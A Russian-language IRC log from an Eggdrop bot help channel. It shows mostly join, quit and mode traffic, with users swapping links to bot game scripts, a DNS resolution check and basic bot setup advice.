[12:13:32] * Akick (xaoc@ircparty.usa.local) Quit (Netsplitted)
[12:13:32] * nikkk14[aw] (immortal@ircparty.usa.local) Quit (Netsplitted)
[12:13:32] * |Absence| (progtech@ircclub.net) Quit (Netsplitted)
[12:13:33] * RainyWill [OFF] (~rainywill@sexfaq.com.ru) Quit (Netsplitted)
[12:13:33] * Buster[off (www-data@union2.ru) Quit (Netsplitted)
[12:13:33] * lamolamo (~lamo@77.41.77.218) Quit (Netsplitted)
[12:13:33] * BaSH (~bash@root.wenet.su) Quit (Netsplitted)
[12:13:33] * CuCADMuH (~CuCADMuH@rinet.msk.wenet.ru) Quit (Netsplitted)
[12:13:33] * Kristina (~Kristina@taganrog.com.ru) Quit (Netsplitted)
[12:13:33] * mult1k (mult1k@irc.tpi.ru) Quit (Netsplitted)
[12:13:33] * vodov_off (Vodov@irc.tpi.ru) Quit (Netsplitted)
[12:13:33] * IRCServ (lamer@games.tpi.ru) Quit (Netsplitted)
[12:13:33] * burzum (torrr@darkside.rinet.net) Quit (Netsplitted)
[12:13:33] * IvDelta-Mainframe (~gr3ml1n@mainframe.ivdelta.ru) Quit (Netsplitted)
[12:13:33] * Nilmerg (~Nilmerg@91.143.175.56) Quit (Netsplitted)
[12:13:33] * Access Denied (~gr3ml1n@ivdelta.bnc) Quit (Netsplitted)
[12:13:33] * Erica (~JustLike@police.exnet.su) Quit (Netsplitted)
[12:13:33] * FreeLanceR|DND (~maximka@ivdelta.bnc) Quit (Netsplitted)
[12:13:33] * ^•_•^ (~dev@ivdelta.bnc) Quit (Netsplitted)
[12:13:33] * noident (~noident@bnc.comtel.local) Quit (Netsplitted)
[12:13:33] * napTu3aH (~napTu3aH@web.satka.ru) Quit (Netsplitted)
[12:13:33] * Enigma (~Enigma@tih.ru) Quit (Netsplitted)
[12:13:33] * FreeForum (~FreeForum@xfire.ru) Quit (Netsplitted)
[12:13:33] * Shad (~qwerty@10.19.1.90) Quit (Netsplitted)
[12:16:39] * RainyWill [OFF] (~rainywill@sexfaq.com.ru) has joined
[12:16:39] * Ninja (~Nikita@213.208.161.122) has joined
[12:16:39] * Arkhangel (~merlin@10636.ostrov.net) has joined
[12:16:39] * FreeForum (~FreeForum@xfire.ru) has joined
[12:16:39] * LE0nid (~leo@10.100.254.21) has joined
[12:16:39] * BOTuHOK (~Sandalik@hell.zhukovskiy.ru) has joined
[12:16:39] * StatBot (~StatBot@freeforum.zhukovsky.msk.wenet.ru) has joined
[12:16:39] * Leva (~Hate@213.59.125.4) has joined
[12:16:39] * Kristina (~Kristina@taganrog.com.ru) has joined
[12:16:39] * mult1k (mult1k@irc.tpi.ru) has joined
[12:16:39] * Access Denied (~gr3ml1n@ivdelta.bnc) has joined
[12:16:40] * FreeLanceR|DND (~maximka@ivdelta.bnc) has joined
[12:16:40] * ^•_•^ (~dev@ivdelta.bnc) has joined
[12:16:40] * vodov_off (Vodov@irc.tpi.ru) has joined
[12:16:40] * Erica (~JustLike@police.exnet.su) has joined
[12:16:40] * burzum (torrr@darkside.rinet.net) has joined
[12:16:40] * noident (~noident@bnc.comtel.local) has joined
[12:16:40] * Enigma (~Enigma@tih.ru) has joined
[12:16:40] * Dexoid[BnC] (dexoid@dexik.ru) has joined
[12:16:40] * |Absence| (progtech@ircclub.net) has joined
[12:16:40] * Dexoid[usa] (dexoid@ircclub.net) has joined
[12:16:40] * staff_[OFF] (NarkooUser@ircclub.net) has joined
[12:16:40] * NickName (stuk@xtmb.info) has joined
[12:16:40] * kns[na] (wenet@xtmb.info) has joined
[12:16:40] * RedWhite`OFF (alexeijke@autokilled.com) has joined
[12:16:40] * Sin (~alex@faktradio.progtech.ru) has joined
[12:16:40] * tem|bnc (~temerlyan@ircworld.ru) has joined
[12:16:40] * _andrew|aw_ (~andrew@ircworld.ru) has joined
[12:16:40] * velik[нету] (~velik@ircworld.ru) has joined
[12:16:40] * woolf (~woolf@bots.solarnet.ru) has joined
[12:16:40] * sets mode: +o RainyWill [OFF]
[12:16:40] * sets mode: +v FreeForum
[12:16:40] * sets mode: +v BOTuHOK
[12:16:40] * sets mode: +v StatBot
[12:16:40] * sets mode: +v Leva
[12:16:40] * sets mode: +v Kristina
[12:16:40] * sets mode: +v mult1k
[12:16:40] * sets mode: +o FreeLanceR|DND
[12:16:40] * sets mode: +v Erica
[12:16:40] * sets mode: +v Enigma
[12:16:40] * sets mode: +v woolf
[12:16:40] * Deil[offline] (~system@wenet.ttn.ru) has joined
[12:16:40] * Xpykep (~daemon@bf.rnd.mediazona.ru) has joined
[12:16:40] * Serena (grant@2306ds2-hvi.1.fullrate.dk) has joined
[12:16:40] * Forum (info@staff.org.ru) has joined
[12:16:40] * IRCServ (lamer@games.tpi.ru) has joined
[12:16:40] * yayce (~yayce@bot.uraltb) has joined
[12:16:40] * napTu3aH (~napTu3aH@web.satka.ru) has joined
[12:16:40] * CuCADMuH (~CuCADMuH@rinet.msk.wenet.ru) has joined
[12:16:40] * zZz (~wtf@ircworld.ru) has joined
[12:16:40] * Exspress (~exspress@unlix.ru) has joined
[12:16:40] * ZVERb[НетУ] (root@MASTERSHELL.ORG) has joined
[12:16:40] * sets mode: +o Deil[offline]
[12:16:40] * sets mode: +v Xpykep
[12:16:40] * sets mode: +v Serena
[12:16:40] * sets mode: +v Forum
[12:16:40] * sets mode: +o IRCServ
[12:16:40] * sets mode: +v yayce
[12:16:40] * sets mode: +v napTu3aH
[12:16:40] * sets mode: +v CuCADMuH
[12:16:40] * Shad (~qwerty@10.19.1.90) has joined
[12:16:40] * Ботик (~ircbot@dsn.ivanovo.wenet.ru) has joined
[12:16:40] * Shell (~link@hub.botnet.tmp.zlug.ru) has joined
[12:16:40] * e}i{uk (~BotRN@10.10.0.17) has joined
[12:16:40] * avers (~recaro@92.63.96.192) has joined
[12:16:40] * Люмиан [gone] (admin@ircparty.usa.local) has joined
[12:16:40] * Akick (xaoc@ircparty.usa.local) has joined
[12:16:40] * nikkk14[aw] (immortal@ircparty.usa.local) has joined
[12:16:40] * kurt (kurt@demanon.ntown) has joined
[12:16:40] * [die] (~ramzes@66.96.221.230) has joined
[12:16:40] * BaSH (~bash@root.wenet.su) has joined
[12:16:40] * VIP (~VIP@bf2.StarNet) has joined
[12:16:40] * st1muL[AWAY\BNC] (~adrenalin@manganum.e-telecom.ru) has joined
[12:16:40] * Mellisa (~Mellisa@proxys.zos-v.ru) has joined
[12:16:40] * Digital_Chaos (~pro-hack@88.205.174.68) has joined
[12:16:40] * lamolamo (~lamo@77.41.77.218) has joined
[12:16:40] * Nilmerg (~Nilmerg@91.143.175.56) has joined
[12:16:40] * AliasNET (~ircd@irc.aliasnet.ru) has joined
[12:16:40] * ^Oo^ (~tele@pc1.aliasnet.ru) has joined
[12:16:40] * LogServ (~null@hub.chel.wenet.ru) has joined
[12:16:40] * net_toxic (~nope@saybrax.pp.ru) has joined
[12:16:40] * Boozer (~Vitek@195.161.191.4) has joined
[12:16:40] * AnToNiO (zzzt@staff.wenet.ru) has joined
[12:16:40] * Mr-X (~irc@webmaster.progtech.ru) has joined
[12:16:40] * Morfein (~home@sopov.ru) has joined
[12:16:40] * Shinoby (~Shinoby@hosting.solarhost.ru) has joined
[12:16:40] * D-Face (~info@upload.uraltb.ru) has joined
[12:16:40] * IvDelta-Mainframe (~gr3ml1n@mainframe.ivdelta.ru) has joined
[12:16:40] * Dmage (~compilato@ws33.zone159.zaural.ru) has joined
[12:16:40] * CheaT (NarkooUser@dimok93.svnet) has joined
[12:16:40] * n_forcer (n_forcer@n-forcer.ntown) has joined
[12:16:40] * yMHuK (Alex@bulalex.svnet) has joined
[12:16:40] * FreeServ (~freeserv@66.96.221.229) has joined
[12:16:40] * sets mode: +v Ботик
[12:16:40] * sets mode: +v Shell
[12:16:41] * sets mode: +v e}i{uk
[12:16:41] * sets mode: +v BaSH
[12:16:41] * sets mode: +v VIP
[12:16:41] * sets mode: +v Mellisa
[12:16:41] * sets mode: +v Nilmerg
[12:16:41] * sets mode: +o AliasNET
[12:16:41] * sets mode: +o net_toxic
[12:16:41] * sets mode: +o D-Face
[12:16:41] * sets mode: +v FreeServ
[12:16:41] * Sanitar (~bot@66.96.221.230) has joined
[12:16:41] * пока спрятался (hamlo@autokilled.com) has joined
[12:16:41] * Pawluxa (VScript2.0@10.1.200.123) has joined
[12:16:41] * Buster[off (www-data@union2.ru) has joined
[12:16:41] * sets mode: +v Sanitar
[12:16:41] * sets mode: +o Buster[off
[12:16:46] * ChanServ sets mode: -o Buster
[12:16:46] * IRCServ sets mode: -l
[12:16:51] * ChanServ sets mode: +o Buster
[12:16:59] * AliasNET sets mode: +l 96
[12:17:03] * Buster (~Buster@80.70.104.6) Quit (Quit: )
[12:17:23] * [-] (~Buster@buster.ivdelta.ru) has joined
[12:17:23] * ChanServ sets mode: +o [-]
[12:17:55] * |EnzoMatrix| (kvirc@zatoichi-host176.hostel6.tsure.ru) has joined
[12:18:26] * Bloborob92 (~Bloborob@trinity-a.majordomo.ru) has joined
[12:18:33] * Bloborob92 (~Bloborob@trinity-a.majordomo.ru) Quit (Client closed connection)
[12:18:34] * [-] is now known as Buster
[12:19:42] * |EnzoMatrix| is now known as EnzoMatrix
[12:21:41] * IvDelta-Mainframe is now known as Gremlin
[12:30:32] * CheaT (NarkooUser@dimok93.svnet) Quit (Quit: Soprano|||Мафия бессмертна)
[12:30:53] * CheaT (NarkooUser@dimok93.svnet) has joined
[12:37:21] * Nick Heidfeld (De_r@172.16.72.187) has joined
[12:37:37] * yMHuK (Alex@bulalex.svnet) Quit (Quit: Пока-пока!!! Я вконтакте: http://vkontakte.ru/id7344133)
[12:37:47] * Gremlin is now known as IvDelta-Mainframe
[12:49:50] * yMHuK (Alex@bulalex.svnet) has joined
[12:54:42] * ModeratoR (rulezzz@kalinnikova.svnet) has joined
[12:54:51] <ModeratoR> ~scripts twirl
[12:54:53] <AliasNET> Я ща более менее вытрезвел)).
[12:55:03] <ModeratoR> ~scripts twi
[12:55:08] <ModeratoR> ~scripts twirl.tcl
[12:55:20] <ModeratoR> ~scripts twirl.tcl
[12:55:22] <ModeratoR> ~script twirl.tcl
[12:55:27] <ModeratoR> сук
[13:00:06] <IRCServ> [864/1097] Ничто так не отвлекает команду от спасения тонущего корабля, как выборы нового капитана. [Jim_Morrison]
[13:00:36] * Digital_Chaos (~pro-hack@88.205.174.68) Quit (Ping timeout)
[13:01:52] * Premier (~premier@78.111.145.242) Quit (Quit: Trust no one.)
[13:06:40] * swallow (n_forcer@n-forcer.ntown) has joined
[13:08:33] * Люмиан [gone] is now known as ~Люмиан~
[13:08:52] * n_forcer (n_forcer@n-forcer.ntown) Quit (Ping timeout)
[13:09:03] <~Люмиан~> Всем привет!
[13:10:26] <ModeratoR> привед
[13:10:36] <ModeratoR> скиньте архивом норм twirl.tcl
[13:10:50] <~Люмиан~> ~scripts
[13:10:53] <~Люмиан~> юзай
[13:10:57] <ModeratoR> ненаходит
[13:11:05] <ModeratoR> ~scripts twirl.tcl
[13:11:11] <~Люмиан~> знач на сайте бастера гляди - там есть
[13:11:21] <ModeratoR> не заходит =)
[13:12:20] * swallow (n_forcer@n-forcer.ntown) Quit (Ping timeout)
[13:12:21] <~Люмиан~> ~scripts spin
[13:12:21] <Jaiss> spin.3.3-by_Buster.zip .29 Kbyte SP[+] [16-11-2007] http://eggdrop.msk.ru/?section=irc&theme=scripts&download=421 Игра в бутылочку, Все мы, наверное, играли в детстве во что-нибудь похожее. Скрипт был написан с нуля, дабы избавиться от имеющихся глюков (в частности при работе с таймером) и увеличить функциональность, теперь в одном скрипте можно использовать несколько баз. При наличии дополнительной библиотеки возможно ведение базы данных н
[13:12:25] <~Люмиан~> юзай
[13:12:28] <ModeratoR> есть
[13:12:30] <~Люмиан~> не находит тоже мне
[13:12:31] <ModeratoR> мне вертелка нужна
[13:12:37] <~Люмиан~> там три игры
[13:12:45] <ModeratoR> ~Люмиан~: мне именно twirl Нада
[13:12:52] <~Люмиан~> зачем?
[13:13:08] <~Люмиан~> у бастера twirl + spin + хателка
[13:13:09] <ModeratoR> ну нада
[13:13:21] <ModeratoR> оО
[13:13:40] <ModeratoR> variable version "3.3"
[13:13:44] <ModeratoR> да не
[13:13:52] <ModeratoR> там всего !кручу и !хочу
[13:14:24] * ~Люмиан~ is now known as Люмиан [gone]
[13:14:27] * Люмиан [gone] is now known as ~Люмиан~
[13:15:37] * damian (n_forcer@n-forcer.ntown) has joined
[13:16:23] * ~Люмиан~ is now known as Люмиан [gone]
[13:16:26] * ~Люмиан~ (~admin@lumian.infy.local) has joined
[13:16:55] <~Люмиан~> чтото провайдер у нас ваще опупел...
[13:16:59] <~Люмиан~> ModeratoR, twirl.v1.1.zip пйодет?
[13:17:34] <ModeratoR> ~Люмиан~: да
[13:17:43] <ModeratoR> только с базой
[13:17:48] * CheaT (NarkooUser@dimok93.svnet) Quit (Quit: Soprano|||Мафия бессмертна)
[13:17:53] * hello_dolly (~a_netu@77.41.77.218) has joined
[13:17:56] * CheaT (NarkooUser@dimok93.svnet) has joined
[13:18:04] <~Люмиан~> ModeratoR, юзай: http://www.eggdrop-moy.net.ru/downloads.php?page_id=32
[13:20:04] <ModeratoR> спс
[13:25:25] * Junior (_sm0ke_@junior69.svnet) has joined
[13:27:41] * Junior (_sm0ke_@junior69.svnet) Quit (Quit: Ditud only...)
[13:33:32] * StatBot (~StatBot@freeforum.zhukovsky.msk.wenet.ru) Quit (Netsplitted)
[13:33:35] * Хозяин_Леса (__________@host251-net128.comtel.local) has joined
[13:34:25] * Guest89670 (newuser@h176.lan225.rs) has joined
[13:34:35] * Guest89670 is now known as enjoy
[13:34:39] * enjoy (newuser@h176.lan225.rs) has left ()
[13:37:18] * CheaT is now known as soprano
[13:38:02] * soprano is now known as CheaT
[13:40:30] * StatBot (~StatBot@freeforum.zhukovsky.msk.wenet.ru) has joined
[13:40:33] * D-Face sets mode: +v StatBot
[13:42:05] * yMHuK (Alex@bulalex.svnet) Quit (Quit: Пока-пока!!! Я вконтакте: http://vkontakte.ru/id7344133)
[13:51:54] * пока спрятался is now known as Zenit_WINNERS_UEFA
[13:51:59] * StatBot (~StatBot@freeforum.zhukovsky.msk.wenet.ru) Quit (Netsplitted)
[13:53:05] * Junior (_sm0ke_@junior69.svnet) has joined
[13:55:43] * Zenit_WINNERS_UEFA is now known as пока спрятался
[13:55:46] * пока спрятался is now known as Джа
[13:56:25] * Джа is now known as пока спрятался
[13:59:03] * damian (n_forcer@n-forcer.ntown) Quit (Read error: Connection reset by peer)
[13:59:17] * Will_aka_Larry (~s@10.20.1.162) has joined
[14:00:06] <IRCServ> [360/1097] <Den> neanton чансерв - не бот, системный сервис. он из пустого канала сам уходит <neanton> во козел... [Den]
[14:00:30] * damian (n_forcer@n-forcer.ntown) has joined
[14:00:54] * damian (n_forcer@n-forcer.ntown) Quit (Read error: Connection reset by peer)
[14:02:18] * damian (n_forcer@n-forcer.ntown) has joined
[14:06:38] * пока спрятался is now known as Джа
[14:08:25] * бебебе (asdf@10.100.30.33) has joined
[14:16:54] * Buster is now known as [-]
[14:25:54] * YooKim (~YooKim@10.16.39.131) has joined
[15:21:00] * YooKim (~YooKim@10.16.39.131) has joined
[15:21:00] * * changes topic to '.: Official EggDrop Help Channel :. LATEST STABLE RELEASE FROM: http://www.eggheads.org/ (Win32 NEW!: http://ovh.dl.sourceforge.net/sourceforge/windrop/windrop1.6.18-handlen32.exe) | Scripts: http://buster.i1.ru/?section=irc&theme=scripts | (Don't msg @/+)'
[15:21:38] * * changes topic to '.: Official EggDrop Help Channel :. LATEST STABLE RELEASE FROM: http://www.eggheads.org/ (Win32 NEW!: http://ovh.dl.sourceforge.net/sourceforge/windrop/windrop1.6.18-handlen32.exe) | Scripts: http://buster.i1.ru/?section=irc&theme=scripts | (Don't msg @/+)'
[15:23:53] * АнетКа (~_______@10.10.111.91) has joined
[15:24:06] <АнетКа> $$$ Всем привет $$$
[15:24:07] * Люмиан[away] (~admin@lumian.infy.local) Quit (Read error: Connection reset by peer)
[15:26:34] * АнетКа is now known as Shalo_play
[15:27:09] * PieSpy (~piespy@10.16.39.66) has joined
[15:27:55] * CheaT|away (NarkooUser@dimok93.svnet) Quit (Killed (Дрямыч (Массовые инвайты запрещены правилами сети!)))
[15:28:20] * CheaT (NarkooUser@dimok93.svnet) has joined
[15:28:53] * CheaT (NarkooUser@dimok93.svnet) Quit (Client closed connection)
[15:29:01] * CheaT (NarkooUser@dimok93.svnet) has joined
[15:29:30] <Koc`> !флаги f
[15:29:30] <Jaiss> f (friend, друг) пользователь не будет наказан за флуд и т.д.
[15:29:37] <Koc`> !флаги o
[15:29:37] <Jaiss> o (op, оператор) права оператора на всех каналах бота
[15:31:47] * Джа is now known as Zenit_WINNERS_UEFA
[15:34:25] * Zenit_WINNERS_UEFA is now known as Джа
[15:38:04] * Junior (_sm0ke_@junior69.svnet) Quit (Quit: Ditud only...)
[15:43:22] * CheaT is now known as staff_
[15:44:28] * staff_ is now known as CheaT
[15:44:58] * Джа is now known as Zenit_WINNERS_UEFA
[15:45:24] * Koc` is now known as |Absence|
[15:48:05] * ~^`~ViSk~`^~ (_RuleZzz_@bifasc.ntown) has joined
[15:51:46] * CheaT is now known as CheaT|away
[15:51:59] * CheaT|away is now known as CheaT
[15:56:22] * Junior (_sm0ke_@junior69.svnet) has joined
[16:00:07] <IRCServ> [397/1097] <PsyCrow> помогите мне <PsyCrow> ХЕЛП!!! <PsyCrow> мне надо что нить чтоб было клево по накурке [Den]
[16:04:07] * slin (pIRCuser90@star5.svnet) has joined
[16:05:23] * slin (pIRCuser90@star5.svnet) has left ()
[16:15:28] * LeXuS (~---@10.16.128.6) has joined
[16:16:45] * Junior (_sm0ke_@junior69.svnet) Quit (Quit: Ditud only...)
[16:17:37] * LeXuS (~---@10.16.128.6) has left ()
[16:20:34] * orkello (mirc616@a200.sub90.net78.udm.net) has joined
[16:20:39] * orkello (mirc616@a200.sub90.net78.udm.net) has left ()
[16:21:37] * [die] is now known as tont
[16:23:19] * CheaT is now known as CheaT|away
[16:37:21] * Shalo_play =М=е=н=я =н=е=т =из=-=за=: Тссс
[16:37:30] * Shalo_play is now known as Shalo_play_отошла
[16:41:38] * IvDelta-Mainframe is now known as Gremlin
[16:47:09] <CheaT|away> Gremlin прив
[16:53:32] * CheaT|away (NarkooUser@dimok93.svnet) Quit (Ping timeout)
[16:55:54] * Extrell (Anton@10.26.12.66) has joined
[16:56:15] * Junior (_sm0ke_@junior69.svnet) has joined
[17:00:31] <IRCServ> [430/1097] <ExeD> Блин короче такая тема у моего браьа комп овернутый твм типо с какойто херн?й на той херне которую втыкают в главную херню.Я комп включил,у мя мышка вырубилась я туда полез,ч?-то д?рнул и из корпуса ч? то потекло ч? делать!!!!!!!!!!!!!!!Брат через два часа приходит!!!!! [Армагеддо]
[17:01:32] * EnzoMatrix (kvirc@zatoichi-host176.hostel6.tsure.ru) Quit (Netsplitted)
[17:05:20] * EnzoMatrix (kvirc@zatoichi-host176.hostel6.tsure.ru) has joined
[17:12:19] * Premier (~premier@78.111.145.242) has joined
[17:24:34] * Extrell (Anton@10.26.12.66) Quit (Quit: pIRC v2.1 < Personal IRC Team > http://xirc.ru/)
[17:29:04] * zlobnoe (stream@staff.ntown) Quit (Ping timeout)
[17:32:31] * zlobnoe (stream@staff.ntown) has joined
[17:33:31] * Shalo_play_отошла (~_______@10.10.111.91) Quit (Ping timeout)
[17:33:31] * zlobnoe is now known as Guest98353
[17:43:41] * CheaT (NarkooUser@dimok93.svnet) has joined
[17:44:55] * FreeLanceR|DND is now known as F_ы_R_в_L_е_С_й_R
[17:54:13] * n_forcer (n_forcer@n-forcer.ntown) has joined
[17:55:36] * damian (n_forcer@n-forcer.ntown) Quit (Ping timeout)
[17:59:40] * Extrell (Anton@10.26.12.66) has joined
[18:00:02] * Extrell (Anton@10.26.12.66) Quit (Quit: pIRC v2.1 < Personal IRC Team > http://xirc.ru/)
[18:00:08] <IRCServ> [198/1097] <Ганеши> народ, а можно отправлять факсчерез локалку (скорее всего нет, ведь факс-модема нет) [зукаусещ]
[18:00:17] * Junior (_sm0ke_@junior69.svnet) Quit (Quit: Ditud only...)
[18:01:27] * Buster is now known as Buster[off]
[18:03:29] * Nick Heidfeld (De_r@172.16.72.187) has joined
[18:04:51] * x[•_•]x (~storm@10.17.226.72) has joined
[18:06:35] <x[•_•]x> Всем привет !
[18:07:00] * x[•_•]x is now known as CkpoMHuk
[18:07:06] * Хозяин_Леса (__________@host251-net128.comtel.local) Quit (Quit: )
[18:11:55] * [-] is now known as Buster
[18:15:24] <CheaT> Buster прив
[18:16:43] * swallow (n_forcer@n-forcer.ntown) has joined
[18:18:33] * n_forcer (n_forcer@n-forcer.ntown) Quit (Ping timeout)
[18:20:46] * Gremlin is now known as IvDelta-Mainframe
[18:21:16] <CheaT> CkpoMHuk прив
[18:22:27] <CkpoMHuk> CheaT ку
[18:22:28] * Kreon (rulezzz@kalinnikova.svnet) has joined
[18:22:31] <Kreon> эта
[18:22:35] * Хозяин_Леса (__________@host251-net128.comtel.local) has joined
[18:22:40] <CheaT> Kreon чё
[18:22:43] <Kreon> у мегахала как вырубить чтобы он в привате не калякал и не запоминал?
[18:22:44] <Kreon> ы
[18:22:53] <CheaT> Kreon ы
[18:22:55] <CheaT> реадми
[18:22:58] <CheaT> спасёт
[18:23:07] <Kreon> нетутамнихуйап
[18:23:11] <tont> этот мир
[18:23:35] <Kreon> в старом ридми это было а вновом нету
[18:23:36] <Kreon> ы
[18:24:43] <CheaT> tont прив
[18:25:45] * Nick Heidfeld (De_r@172.16.72.187) Quit (Quit: Nick Heidfeld - BMW Sauber F1 Team. Fansite: http://nickheidfeld.org.ru)
[18:29:47] <CkpoMHuk> tont Добрый вечер Александр Васильевич ! :)
[18:31:33] * Extrell (Anton@10.26.12.66) has joined
[18:31:39] * Extrell (Anton@10.26.12.66) Quit (Client closed connection)
[18:31:47] * Benz (~Benz@lan1-2-236.unity) has joined
[18:32:43] * Хедин is now known as Хедин|away
[18:32:43] * Хедин|away ..:: УшЁл, ОтМазКа »»» Дела ««« ::..
[18:36:18] * n_forcer (n_forcer@n-forcer.ntown) has joined
[18:37:37] * swallow (n_forcer@n-forcer.ntown) Quit (Ping timeout)
[18:41:24] * swallow (n_forcer@n-forcer.ntown) has joined
[18:43:00] * n_forcer (n_forcer@n-forcer.ntown) Quit (Ping timeout)
[18:45:40] * Digital_Chaos (~pro-hack@88.205.167.203) Quit (Ping timeout)
[18:46:06] * kl (NarkooUser@dimok93.svnet) has joined
[18:46:16] * kl (NarkooUser@dimok93.svnet) Quit (Client closed connection)
[18:46:33] * CheaT (NarkooUser@dimok93.svnet) Quit (Read error: Connection reset by peer)
[18:46:34] * kl (NarkooUser@dimok93.svnet) has joined
[18:46:48] * kl is now known as CheaT
[18:47:12] * Kreon (rulezzz@kalinnikova.svnet) Quit (Ping timeout)
[18:47:53] * slin (pIRCuser90@star5.svnet) has joined
[18:48:43] * Digital_Chaos (~pro-hack@88.205.167.203) has joined
[18:49:43] * RainyWill [OFF] is now known as RainyWill
[18:49:53] * slin (pIRCuser90@star5.svnet) has left ()
[18:52:17] * ~Люмиан~ (~admin@lumian.infy.local) has joined
[18:52:48] <~Люмиан~> Всем привет!
[18:58:39] * Хозяин_Леса (__________@host251-net128.comtel.local) Quit (Quit: )
[18:59:40] <tont> !dns localhost.tehnosoft.ru
[19:00:08] <IRCServ> [702/1097] Неловко брошенное слово может и поколечить, причем не столько оппонента, сколько того, у кого оно вырвалось [^p^]
[19:01:42] * n_forcer (n_forcer@n-forcer.ntown) has joined
[19:02:56] <~Люмиан~> эм...
[19:03:06] <~Люмиан~> tont, откуда такой хост?
[19:03:27] <tont> *lumian VolNet telnet@localhost.tehnosoft.ru
[19:03:34] * swallow (n_forcer@n-forcer.ntown) Quit (Ping timeout)
[19:03:37] <~Люмиан~> ыыы
[19:03:44] <~Люмиан~> прикольный у меня хост))
[19:03:59] <tont> откуда?
[19:03:59] <~Люмиан~> поидее должно быть localhost
[19:04:01] * yMHuK (Alex@bulalex.svnet) has joined
[19:04:08] <tont> чёт не резолвицца
[19:04:15] <~Люмиан~> ибо подключался через 127.0.0.1
[19:04:16] <~Люмиан~> ))
[19:04:30] <~Люмиан~> у нас видимо так локальные хосты резолвятся ))
[19:04:43] <Buster> nslookup
[19:05:29] * Extrell (Anton@10.26.12.66) has joined
[19:05:50] * Extrell (Anton@10.26.12.66) Quit (Quit: pIRC v2.1 < Personal IRC Team > http://xirc.ru/)
[19:06:19] <~Люмиан~> Server: gw.tehnosoft.ru
[19:06:19] <~Люмиан~> Address: 80.92.3.90
[19:06:19] <~Люмиан~> *** gw.tehnosoft.ru can't find localhost.tehnosoft.ru: Non-existent domain
[19:06:20] <AliasNET> Http://ru.
[19:09:24] * IvDelta-Mainframe is now known as Gremlin
[19:16:32] * CheaT is now known as CheaT|is dead
[19:20:58] * Че_бурашка (4e@172.28.10.186) has joined
[19:21:09] <Че_бурашка> где канал помощи во fbot
[19:21:13] <Че_бурашка> ?
[19:22:50] * Junior (_sm0ke_@junior69.svnet) has joined
[19:22:56] * Benz (~Benz@lan1-2-236.unity) Quit (Quit: КтО На ЗОС'е Не БыВаЛ КрАсОтЫ Не ВиДал.)
[19:26:50] * Benz (~Benz@lan1-2-236.unity) has joined
[19:27:07] <CkpoMHuk> Че_бурашка а какая тебе там помощь нужна... ?пропиши сервер и ник и вперед с песней он настроен !
[19:27:25] * AliasNET sets mode: +l 108
[19:27:33] <Че_бурашка> CkpoMHuk я качаю голого, ненастроенного
[19:27:38] <Че_бурашка> и прописываю
[19:27:40] <Че_бурашка> он не заходит
[19:28:01] <CkpoMHuk> руки кривые.. всё долно заходить и тд
[19:28:10] <Че_бурашка> )
[19:28:23] <Че_бурашка> да вроде все правильно прописал
[19:28:44] <CkpoMHuk> Че_бурашка я заметил )
[19:28:49] <Че_бурашка> )
[19:31:30] <CkpoMHuk> Че_бурашка солнце еще высоко ) трудись )
[19:31:31] * Gremlin (~gr3ml1n@mainframe.ivdelta.ru) Quit (Ping timeout)
[19:31:35] <Че_бурашка> )
[19:31:41] <Че_бурашка> да я уже голову сломал
[19:32:05] <CkpoMHuk> Че_бурашка 1) сервер ему напиши 2) ник бота 3) канал куда зайти
[19:32:31] * Gremlin (~gr3ml1n@mainframe.ivdelta.ru) has joined
[19:32:36] <CkpoMHuk> Че_бурашка ну и посмари как запустишь /whois ник бота если не найдешь значит его нет )
[19:34:55] * Kreon (rulezzz@kalinnikova.svnet) has joined
[19:37:49] * Buster (~Buster@buster.ivdelta.ru) Quit (Ping timeout)
[19:38:31] * [-] (~Buster@80.70.104.6) has joined
[19:38:31] * ChanServ sets mode: +o [-]
[19:42:24] * Хедин|away ..:: ПрИшЁл »»» Меня Не было: 1hr 9mins 40secs »»» Отсутствовал по причине: Дела ««« ::..
[19:42:24] * Хедин|away is now known as Хедин
[19:45:27] * Reiko (helpteam@172.31.255.96) has joined
[19:46:24] <Reiko> Добрый ночер
[19:47:03] <Че_бурашка> здравствуйте
[19:47:27] <Че_бурашка> как вам последние отчеты рынка, полагаю не очень обнадеживающие
[19:48:41] * CheaT|is dead is now known as CheaT
[19:52:56] * Хедин (autokill@h113.lan213.rs) Quit (Quit: )
[20:00:09] <IRCServ> [764/1097] В горизонтальном положении длина ног женщины уже не имеет значения. [sobак ]
[20:12:45] * Че_бурашка (4e@172.28.10.186) has left ()
[20:18:43] * Gremlin is now known as IvDelta-Mainframe
[20:20:37] * CheaT (NarkooUser@dimok93.svnet) Quit (Quit: Soprano|||Мафия бессмертна)
[20:21:04] * CheaT (NarkooUser@dimok93.svnet) has joined
[20:21:26] * xamyt (fox@xamyt.aviel.ru) has joined
[20:21:26] * ChanServ sets mode: +o xamyt
[20:22:18] * slin (pIRCuser90@star5.svnet) has joined
[20:22:24] * Vrunner (~Vrunner@xfire.ru) has joined
[20:22:24] * Vrunner (~Vrunner@xfire.ru) has left (^_^)
[20:22:30] * slin (pIRCuser90@star5.svnet) has left ()
[20:23:19] * Стратег (User@ip-83-149-3-61.nwgsm.ru) has joined
[20:24:11] * Стратег (User@ip-83-149-3-61.nwgsm.ru) has left ()
[20:26:41] * barakuda (~MirandaLS@10.248.0.122) has joined
[20:27:52] * Benz (~Benz@lan1-2-236.unity) Quit (Quit: КтО На ЗОС'е Не БыВаЛ КрАсОтЫ Не ВиДал.)
[20:28:05] * Extrell (Anton@10.26.12.66) has joined
[20:31:02] * barakuda (MirandaLS@10.248.0.122) has left ()
[20:32:12] * STarTuK (pIRCuser63@dollar.sky) has joined
[20:32:37] * Nick Heidfeld (De_r@172.16.72.187) has joined
[20:33:31] * STarTuK (pIRCuser63@dollar.sky) Quit (Quit: ((Хай Всем)))
[20:33:59] * Extrell (Anton@10.26.12.66) Quit (Quit: pIRC v2.1 < Personal IRC Team > http://xirc.ru/)
[20:35:12] * ~Люмиан~ (~admin@lumian.infy.local) Quit (Quit: В жизни многое случается по воле случая...)
[20:35:17] * Люмиан [gone] is now known as ~Люмиан~
[20:43:33] * ~Люмиан~ is now known as Люмиан [gone]
[20:46:38] * АнетКа (~_______@10.10.111.91) has joined
[20:46:59] <АнетКа> $$$ Всем привет $$$
[20:47:04] * IvDelta-Mainframe is now known as Gremlin
[20:47:57] * CheaT (NarkooUser@dimok93.svnet) Quit (Client closed connection)
[20:48:06] * CheaT (NarkooUser@dimok93.svnet) has joined
[20:48:53] * Nick Heidfeld (De_r@172.16.72.187) Quit (Quit: Nick Heidfeld - BMW Sauber F1 Team. Fansite: http://nickheidfeld.org.ru)
[20:49:14] * АнетКа is now known as Shalo_play
